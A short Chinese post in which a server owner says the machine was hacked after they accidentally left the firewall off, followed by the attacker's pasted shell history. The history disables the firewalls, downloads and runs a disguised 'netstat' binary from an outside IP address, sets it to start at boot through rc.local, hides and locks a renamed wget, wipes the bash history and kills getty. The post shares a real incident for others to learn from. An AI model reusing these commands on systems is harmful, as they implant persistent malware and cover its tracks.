由于失误关闭防火墙后忘记开启,导致服务器被攻击,只能认倒霉了!
下面贴出来“黑客大哥的杰作”,还好这个黑客大哥没有更坏的恶意!
301 service sshd stop
302 exit
303 ss
304 ifconfig
305 ethtool eth0
306 /etc/init.d/iptables stop
307 service iptables stop
308 SuSEfirewall2 stop
309 reSuSEfirewall2 stop
310 iptables -F
311 cd ..
312 cd ./etc
313 wget http://43.251.16.220:55648/netstat
314 chmod +x netstat
315 ./netstat
316 echo "/etc/netstat">>/etc/rc.local
317 echo "cd /etc/">>/etc/rc.local
318 echo "/netstat&">>/etc/rc.local
319 echo "/etc/init.d/iptables stop">>/etc/rc.local
320 cp -f /usr/bin/wget /usr/bin/.ooet
321 chmod 755 /usr/bin/.ooet
322 chattr +i /usr/bin/.ooet
323 rm -f /usr/bin/wget
324 echo > ./.bash_history
325 killall -9 getty
326 rm -f /usr/bin/bsd-port/getty
327 touch /usr/bin/bsd-port/getty
328 chmod 0 /usr/bin/bsd-port/getty
329 chattr +i /usr/bin/bsd-port/getty
330 echo > ./.bash_history
331 service sshd status
332 root
333 service sshd start